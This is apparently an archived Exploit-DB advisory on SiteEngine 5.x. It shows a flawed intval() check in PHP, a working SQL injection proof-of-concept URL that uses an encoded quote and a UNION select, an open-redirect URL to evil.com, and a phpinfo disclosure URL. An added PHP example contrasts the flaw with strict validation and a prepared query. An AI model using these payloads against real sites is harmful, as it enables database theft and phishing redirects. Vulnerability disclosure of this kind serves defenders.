SiteEngine 5.x - Multiple Vulnerabilities

EDB-ID: 6823
Author: xy7
Type: webapps
Platform: PHP
Date: 2008-10-23


SiteEngine 5.x Multiple Remote Vulnerabilities
Because the intval() function is used incorrectly, the parameter check can be bypassed, resulting in a SQL injection vulnerability.

-=0x01=- SQL injection Vulnerability
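Vulnerable code (the check only tests whether intval( $id ) is non-zero; the original, unconverted $id is then placed in the query):
if ( intval( $id ) )
{
    require_once( $site_engine_root."lib/rss.php" );
    // $id is still the raw request string here, not the integer intval() returned
    $sql = "SELECT url FROM ".$tablepre."feed WHERE id={$id} AND uploader='{$SESSION['uid']}'";
    // ... (excerpt ends here)
}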

POC:
http://www.test.com/announcements.php?id=1%bf%27%20and%201=2%20%20UNION%20select%201,2,user(),4,5,6,7,8,9,10,11%20/*
This vulnerability exists in board.php too.
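
The following is an added example, not SiteEngine code and not part of the original advisory: it contrasts the intval() truth test from the excerpt with strict validation and a parameterized query. The helper names, the "se_" table prefix and the sample rows are assumptions made for illustration, and the demo assumes the pdo_sqlite extension is available.

```php
<?php
// Added example, not SiteEngine code. Helper names, the "se_" prefix and the
// sample rows are constructed; assumes the pdo_sqlite extension is enabled.

// Pattern from the excerpt: intval() is only a truth test, so any string
// that starts with a non-zero digit passes and the raw string is reused.
function flawed_check(string $id): bool
{
    return (bool) intval($id);
}

// Strict validation: the whole string must be a positive decimal integer.
// Returns the integer so callers never touch the raw string again.
function parse_id(string $id): ?int
{
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $n === false ? null : $n;
}

// Hardened lookup: validated integer plus bound parameters. $tablepre comes
// from configuration, never from the request.
function fetch_feed_url(PDO $db, string $tablepre, string $rawId, string $uid): ?string
{
    $id = parse_id($rawId);
    if ($id === null) {
        return null; // reject instead of querying
    }
    $stmt = $db->prepare("SELECT url FROM {$tablepre}feed WHERE id = :id AND uploader = :uid");
    $stmt->execute([':id' => $id, ':uid' => $uid]);
    $url = $stmt->fetchColumn();
    return $url === false ? null : (string) $url;
}

// Constructed inputs: compare what each check accepts.
foreach (['7', '7 trailing text', '0', 'abc'] as $raw) {
    printf("%-20s flawed=%-5s strict=%s\n", var_export($raw, true),
        var_export(flawed_check($raw), true), var_export(parse_id($raw), true));
}

// Constructed in-memory table to exercise the hardened lookup.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE se_feed (id INTEGER, url TEXT, uploader TEXT)");
$db->exec("INSERT INTO se_feed VALUES (7, 'http://example.test/rss', '42')");
var_dump(fetch_feed_url($db, 'se_', '7', '42'));
var_dump(fetch_feed_url($db, 'se_', '7 trailing text', '42'));
```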

-=0x02=- URI Redirection Vulnerability
POC:
http://www.test.com/api.php?action=logout&forward=http://evil.com

-=0x03=- Information Disclosure Vulnerability
POC:
http://www.test.com/misc.php?action=php_info

ForFun~

-=EOF=-

# milw0rm.com [2008-10-23]